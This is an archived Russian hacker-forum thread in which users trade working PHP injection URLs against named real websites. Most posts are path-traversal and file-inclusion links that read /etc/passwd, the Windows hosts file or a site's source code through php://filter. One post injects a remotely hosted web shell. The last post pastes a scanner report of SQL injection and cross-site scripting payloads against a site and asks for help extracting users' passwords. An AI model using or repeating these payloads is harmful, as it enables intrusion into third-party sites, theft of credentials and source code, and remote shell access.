Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

RE: Ваши PHP-инъекции

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> RE: Ваши PHP-инъекции
Имя
Сообщение << Старые топики   Новые топики >>
RE: Ваши PHP-инъекции - 2010-05-21 15:34:34.040000   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.narvik.us/index.php?side=../../../../etc/passwd%00 http://www.gkflora.no/index.php?side=/etc/passwd%00
Post #: 41
RE: Ваши PHP-инъекции - 2010-05-24 17:05:49.393333   
MERRON

Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
http://www.mtcwork.com.au/about.php?file=../../../../../../../../windows/system32/drivers/etc/hosts

http://www.jrodrigues.com/index.php?file=../../../../../../etc/passwd
Post #: 42
RE: Ваши PHP-инъекции - 2010-06-16 04:45:20.570000   
DeepBlue7.

Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
http://www.stm-spb.ru/osn.php?page=../../../../etc/passwd
Post #: 43
RE: Ваши PHP-инъекции - 2010-06-17 01:24:13.020000   
MERRON

Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
http://www.lvs.ru/index.php?id=internet&page=../../../../../etc/passwd%00
Post #: 44
RE: Ваши PHP-инъекции - 2010-07-04 02:55:00.036666   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
Remote File Inclusion
http://www.svetyashki.ru/gallery.php?page=http://kido-worm.narod2.ru/DxShell.php http://www.svetyashki.ru/gallery.php?page=phpinfo(); ">
Post #: 45
RE: Ваши PHP-инъекции - 2010-07-21 14:00:13   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
Новосибирский Государственный Университет
http://www.ict.nsc.ru/matmod/index.php?file=../../../../../../../../../../../../../../../../etc/passwd%00
Post #: 46
RE: Ваши PHP-инъекции - 2010-08-11 20:12:52.060000   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.galbraithchiropractic.com/index.php?file=./../../../../../../../../etc/passwd%00
Post #: 47
RE: Ваши PHP-инъекции - 2010-10-23 21:10:02.863333   
Паприка

Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
http://www.pogpet.am/sis/index.php?page=/var/log/dmesg
Post #: 48
RE: Ваши PHP-инъекции - 2010-10-23 21:12:48.563333   
Паприка

Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
http://www.summer-fun.info/ru/index.php?pageid=php://filter/convert.base64-encode/resource=index
Декодим из Base64 и читаем код индекса
Post #: 49
RE: Ваши PHP-инъекции - 2010-11-02 17:31:55.773333   
Торгушка

Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
http://www.huntington.laurentian.ca/index.php?file=../../../../../etc/passwd
Post #: 50
RE: Ваши PHP-инъекции - 2010-11-02 17:33:25.220000   
Торгушка

Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
http://en.brazilny.org/force-download.php?file=../../../../../../etc/passwd

- сохраняем как passwd.txt и открываем
Post #: 51
RE: Ваши PHP-инъекции - 2010-11-02 17:35:13.896666   
Торгушка

Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
http://www.webcreativestudio.com/?id=inter¶m=doc_php&lang=2&doc_dop_param=../../../../../../../../etc/passwd


И просматриваем в исходном тексте
Post #: 52
RE: Ваши PHP-инъекции - 2010-12-26 21:18:14.986666   
GroA

Сообщений: 37
Оценки: 0
Присоединился: 2010-09-08 13:32:58.983333
И для чего это все нужно?
Post #: 53
RE: Ваши PHP-инъекции - 2010-12-30 22:41:36.500000   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

quote:

ORIGINAL: GroA

И для чего это все нужно?

по бойся гугла задавая такие вопросы…
http://www.kaspibank.kz/?opt=http://forum.xakep.ru/sdfsdfsdfsdfsdfsdf.php
Post #: 54
RE: Ваши PHP-инъекции - 2011-05-17 17:17:49.133333   
ZiMMy

Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
http://www.fihgu.com/index.php?pagina=/etc/passwd
Post #: 55
RE: Ваши PHP-инъекции - 2011-06-07 13:58:59.280000   
MagicMight

Сообщений: 49
Оценки: 0
Присоединился: 2010-04-21 22:42:34.316666
http://www.prodisney.ru/index.php?page=any_site http://sambo-asia.org/index.php?page=any_site
Post #: 56
RE: Ваши PHP-инъекции - 2011-12-14 17:27:34.750000   
slawyanin

Сообщений: 8
Оценки: 0
Присоединился: 2011-11-14 16:01:17.530000
ПОМОГИТЕ ПРАВИЛЬНО СФОРМИРОВАТЬ ЗАПРОС ЧТОБЫ УЗНАТЬ ПАССЫ ЮЗВЕРОВ ВОТ ИНФА О САЙТЕ

Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

Extracted Version: X-Powered-By: PHP/5.2.14

Vulnerable URL : http://www.ccылкунедам.com/forgot.php
Parameter Name: Email <==========
Parameter Type: Post <==========
Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Vulnerable URL : http://www.ccылкунедам.com/forgot.php
Identified Internal Path(s): /home/tnburns/public_html/ccылкунедам.com/forgot.php
Parameter Name: Email <==================
Parameter Type: Post
Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Vulnerable URL : http://www.ccылкунедам.com/forgot.php
Parameter Name: Email <=========
Parameter Type: Post
Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Vulnerable URL : http://www.ccылкунедам.com/forgot.php
Parameter Name: Email <———-
Parameter Type: Post <———
Attack Pattern: ' OR 'ns'='ns <—

Vulnerable URL : http://www.ccылкунедам.com/members.php
Identified Field Name: password <—-

Vulnerable URL : http://www.ccылкунедам.com/members.php
Form target action: members.php <—–

Vulnerable URL : http://www.ccылкунедам.com/members.php
Identified Internal Path(s): /home/tnburns/public_html/ccылкунедам.com/members.php
Parameter Name: id <—–
Parameter Type: Post <—–
Attack Pattern: 1%27+or+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)–+1

Vulnerable URL : http://www.ccылкунедам.com/
Identified Cookie: PHPSESSID
Vulnerable URL : http://www.ccылкунедам.com/Scripts/'"–><script>netsparker(0x00003B)</script>
Parameter Name: URI-BASED <—–
Parameter Type: RawUrlInjection <======
Attack Pattern: '"–><script>netsparker(0x00003B)</script>


НА ПРИМЕРЕ ЭТОЙ ССЫЛКИ: http://www.site.com/forgot.php?Email=default
Post #: 57
Страниц:  1 [2]
Все форумы >> [Уязвимости] >> RE: Ваши PHP-инъекции







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.